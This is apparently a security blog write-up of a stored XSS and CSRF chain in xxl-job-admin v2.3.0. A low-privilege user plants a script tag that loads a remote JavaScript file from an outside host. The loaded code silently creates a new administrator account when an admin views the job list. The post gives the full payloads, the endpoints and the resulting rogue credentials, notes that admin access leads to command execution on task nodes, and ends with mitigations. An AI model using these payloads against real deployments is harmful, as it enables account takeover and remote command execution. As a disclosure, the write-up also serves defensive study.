xxl-job-admin v2.3.0 Stored XSS and CSRF Vulnerabilities Combination to Create Administrator

a7qyws3x posted on 2021-11-29 in Java

Version and Deployment

Product Version

xxl-job-admin v2.3.0

Deployment

mkdir -p /tmp/xxl-job

docker run -d -e PARAMS="--spring.datasource.url=jdbc:mysql://{MYSQL_IP}:{MYSQL_PORT}/xxl_job?useUnicode=true&characterEncoding=UTF-8&autoReconnect=true&serverTimezone=UTC --spring.datasource.username={MYSQL_USER} --spring.datasource.password={MYSQL_PASSWD} --spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver" -p {XXL-JOB-ADMIN_SERVICE_PORT}:8080 -v /tmp/xxl-job:/data/applogs --name xxl-job -d xuxueli/xxl-job-admin:2.3.0

Replace {MYSQL_IP}, {MYSQL_PORT}, {MYSQL_USER}, {MYSQL_PASSWD} and {XXL-JOB-ADMIN_SERVICE_PORT} with the actual values.

Then import https://github.com/xuxueli/xxl-job/blob/master/doc/db/tables_xxl_job.sql into MySQL.

Stored XSS

There are two users in this example: admin (administrator) and tari (a normal user with only the default executor permission).

Log in to the tari account and go to http://127.0.0.1:8089/xxl-job-admin/jobinfo [任务管理] (Job Management) > drop-down [操作] (Actions) box > [编辑] (Edit).

Enter the XSS payload in the [任务描述] (Job Description) field:

<script src="http://tari.local:8888/payload1.js"/>

The content of payload1.js is:

alert(2)

Click [保存] (Save). The request actually goes to the http://127.0.0.1:8089/xxl-job-admin/jobinfo/update API endpoint.

The stored XSS is triggered when an admin visits http://127.0.0.1:8089/xxl-job-admin/jobinfo.

Use CSRF to Bypass HttpOnly

We can see that HttpOnly is enabled on this site's session cookie, which means we cannot read the administrator's cookie directly from script.

Looking at the HTTP request, there is no CSRF token field or anything similar.

So payload1.js can be modified to bypass HttpOnly: instead of reading the cookie, it sends a request that carries the administrator's session automatically.

const xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (this.readyState === 4) {
       console.log('pwn')
    }
};
xhr.open("POST", "http://127.0.0.1:8089/xxl-job-admin/user/add", false);
xhr.withCredentials = true;
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
const params = "username=bypass&password=bypass&role=1&permission=";
xhr.send(params);

The next time an administrator visits http://127.0.0.1:8089/xxl-job-admin/jobinfo, an administrator account bypass/bypass is created.

Other XSS Output Locations

http://127.0.0.1:8089/xxl-job-admin/jobinfo [任务管理] (Job Management) > drop-down [操作] (Actions) box > [查询日志] (Query Log)

XSS can also be triggered here.

Further Thoughts on Exploiting the Vulnerabilities

xxl-job is a distributed task scheduling platform. With administrator privileges, an attacker can schedule jobs, which means executing arbitrary commands on all of the nodes that run the managed tasks.

Mitigation

  1. Validate user-provided input in the /xxl-job-admin/jobinfo/update API to catch potentially malicious content.
  2. HTML-entity-encode data returned by the backend API before rendering it, to prevent XSS.
  3. Use a CSRF token to prevent CSRF.
